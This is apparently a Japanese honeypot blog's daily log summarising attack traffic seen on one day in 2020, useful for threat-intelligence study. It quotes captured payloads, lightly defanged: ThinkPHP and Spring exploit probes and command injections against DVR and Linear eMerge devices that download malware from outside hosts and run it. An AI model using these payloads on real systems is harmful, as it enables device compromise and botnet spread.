23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(331日目)

2020/02/12(水)

トータルは228件でした。

ハンティングログは以下です。

189.50.252[.]238 wget+hxxp[:]//178.128.183[.]31/arm7

www.virustotal.com
www.virustotal.com

62.86.203[.]177 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
139 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
43 アクセス GET /
20 調査 GET /script
6 調査 GET /is_test
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 不正中継の試み CONNECT www.ipip.net:443
2 不正中継の試み CONNECT www.baidu.com:443
2 不正中継の試み CONNECT cn.bing.com:443
1 調査 OPTIONS /
1 MVPower DVRなどの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//178.128.183.31/arm7;chmod+777+arm7;/tmp/arm7+selfrep.jaws.arm7
1 LineareMerge E3シリーズの脆弱性(CVE-2019-7256)を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
1 不正中継の試み CONNECT ip.ws.126.net:443